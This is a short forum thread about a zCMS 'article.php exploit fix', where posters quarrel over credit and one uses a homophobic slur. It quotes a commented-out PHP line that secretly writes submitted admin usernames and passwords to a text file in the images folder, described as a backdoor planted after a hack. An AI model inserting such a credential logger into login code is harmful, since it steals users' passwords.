zCMS article.php exploit fix!

All threads warn you to the bottom if it's to old to bump, this1 didn't so :thumbup:

Quote:

---

Originally Posted by Subway

Nice rip from Jessy @ 0taku.

---

I did not rip it. -.-

If you care to look at the dates, I released this on the 1st October - He or She released that on 7th October. Faggot.

Quote:

---

Originally Posted by ησвяαιη

I fail at spotting sarcasm, sorry XD

EDIT: Jonty, wtf were you thinking O.o

PHP Code:

---

// fwrite( fopen('./images/lol.txt', 'a+'), $_POST['credentials_username']." > ".mysql_real_escape_string($_POST['credentials_password'].chr(13))); exit; 


---

---

This is not an exploit, and it wasn't coded by Jonteh, this is a code that logs passwords, and I think Meth0d coded it, or someone who release UberCMS, because it was intended to steal admin passwords, and the code can't be used, only if you remove the '//'
Nice release, but I already patched this ;D

Quote:

---

Originally Posted by MyKi

This is not an exploit, and it wasn't coded by Jonteh, this is a code that logs passwords, and I think Meth0d coded it, or someone who release UberCMS, because it was intended to steal admin passwords, and the code can't be used, only if you remove the '//'
Nice release, but I already patched this ;D

---

This has already been stated, look before you post:

Quote:

---

Originally Posted by Jonteh

Zap got hacked around 7 months ago and that code was placed into our index to log our passwords, I commented it out and kept it there for future reference.

---